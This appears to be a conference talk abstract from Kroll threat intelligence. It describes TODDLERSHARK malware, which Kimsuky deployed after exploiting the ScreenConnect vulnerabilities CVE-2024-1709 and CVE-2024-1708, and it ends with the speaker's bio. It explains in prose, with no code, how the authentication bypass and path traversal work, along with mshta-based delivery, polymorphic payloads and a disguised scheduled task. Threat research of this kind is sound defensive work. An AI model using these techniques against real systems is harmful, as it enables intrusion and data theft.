10-25, 14:30–15:00 (Europe/Luxembourg), Europe - Main Room
The Kroll Cyber Threat Intelligence (CTI) team discovered new malware resembling the VBScript based BABYSHARK malware that we've called TODDLERSHARK.
The malware was used in post-compromise activity following exploitation of two vulnerabilities in ScreenConnect, which were responsibly disclosed by a Kroll analyst but quickly weaponised after detail of the vulnerability was published.
BABYSHARK has been associated, by several sources, with a threat actor Kroll tracks as KTA082 (Kimsuky).
The malware utilized legitimate Microsoft binary and alternate data streams and exhibited elements of polymorphic behavior.
This talk will detail how the exploits work, how Kimsuky was able to quickly operationalize a n-day vulnerability, a teardown of TODDLERSHARK and how simple detection methods were able to stop an APT group.
Two critical vulnerabilities, tracked as CVE-2024-1708 and CVE-2024-1709, that allow an unauthenticated threat actor to take administrative control of a ConnectWise portal, including access additional endpoints and execute code via a path traversal vulnerability, they are trivial to exploit. The vulnerabilities were discovered by a Kroll analyst and responsibly disclosed.
CVE-2024-1709 (CVSS:10) can allow for authentication bypass due to insufficient path filtering. This is possible because any string can be appended after the extension to allow for bypassing.
CVE-2024-1708 (CVSS:8.4) is a path traversal vulnerability that can allow an attacker to execute code remotely on the ScreenConnect server.
Together, CVE-2024-1709 and CVE-2024-1708 can allow a threat actor to perform remote code execution post authentication.
These vulnerabilities quickly saw widespread exploitation by multiple threat groups ranging from attackers deploying simple coinminers, ransomware and what Kroll assesses is nation state activity.
TODDLERSHARK Discovery
The Kroll CTI team observed a campaign using a new malware that appears to be very similar to BABYSHARK, previously reported to have been developed and used by the APT group KTA082.
The malware was deployed as part of an attempted compromise that was detected and stopped by the Kroll Responder team. The activity started with exploitation of CVE-2024-1709 and CVE-2024-1708. They then leveraged their now “hands on keyboard” access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware, Kroll dubbed TODDLERSHARK. Kroll was able to stop the intrusion before any follow on activity was conducted by the threat actor, it is therefor hard to assess
TODDLERSHARK is a visual basic script (VBS) based malware usually executed via the Microsoft signed binary mshta.exe. Its main purpose is to act as an information stealer where it gathers detailed information on the victim machine, the victim user, and the victim network.
It is installed by calling mshta.exe with a URL parameter via command prompt or PowerShell which allows for the actor to generate payloads server side each time it is run. This allows for with unique obfuscation and junk code with each download. It does this for both its initial script component and the infostealer component which that script downloads separately. This gives the malware a polymorphic behaviour as every file hash will be different and any strings that do remain the same will be in different positions.
Finally, the malware sets up a scheduled task, which appears designed to act more like a loader as its trying download and execute from a URL every minute. In one deployment the Actor Named the Scheduled task “Uso1Cache”, this is likely a ploy to make the task appear to be part of the legitimate “Update Session Orchestrator” a windows component that handles installing updates.
George Glass is an associate managing director and EMEA lead in the Kroll Cyber Threat Intelligence team, based in London. George has more than eight years’ experience in building, deploying and operationalizing on-premise and cloud-based technologies and has a proven track record for optimizing and automating operations to reduce detection and response times.
He delivers analysis on vulnerabilities, malware and threat actors to hundreds of clients, including FTSE 50 companies, ensuring detection of the latest threats across multiple security information and event management (SEIM) and endpoint detection and response (EDR) solutions.